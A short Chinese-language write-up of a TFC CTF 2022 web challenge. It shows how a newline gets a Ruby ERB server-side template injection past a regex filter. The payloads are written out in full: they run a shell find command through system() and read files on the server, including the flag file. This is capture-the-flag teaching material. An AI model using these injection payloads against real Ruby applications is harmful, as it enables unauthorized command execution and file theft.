TFC CTF 2022 WEB Diamand WriteUp

题目信息

看题目就是考察如何绕过filter。

探索

具体页面，输入字符提交后进行回显，用Burp跑常见的ascii特殊字符可以发现都被过滤了。

试了一下%df发现有报错信息：

报错信息展开后可以看到网站具体使用的技术栈，ERB类似于python的jinja2之类的，网上能找到存在模板注入的问题参考，所以接下来的方向就是构造模板注入的参数，通过回显来找flag。

开搞

• 正则绕过：
  通过%0a(即换行符)隔开正常文本和我们要执行的模板注入信息，正则匹配默认是不换行检测的。
• 模板注入：ERB的模板格式为<%= code %>，写在url里需要对%进行URL编码，在Burp中需要把空格改为+号。模板内的代码要做的事：找flag文件，读取内容(Ruby的system()返回结果为是否执行成功，为图方便写成了多个命令的形式)

# 查找flag文件 find / -name *flag* >1.txt
input=111%0a<%25=+system('find+/+-name+*flag*+>1.txt')+%25>
# 读取find搜索结果
input=111%0a<%25=File.read("1.txt").split%25>
# 读取flag内容
input=111%0a<%25=File.read("/app/flag.txt").split%25>

读取find结果：

拿flag

标签：WEB,读取,WriteUp,TFC,flag,0a,input,find,模板
来源： https://www.cnblogs.com/sukinoaria/p/16536631.html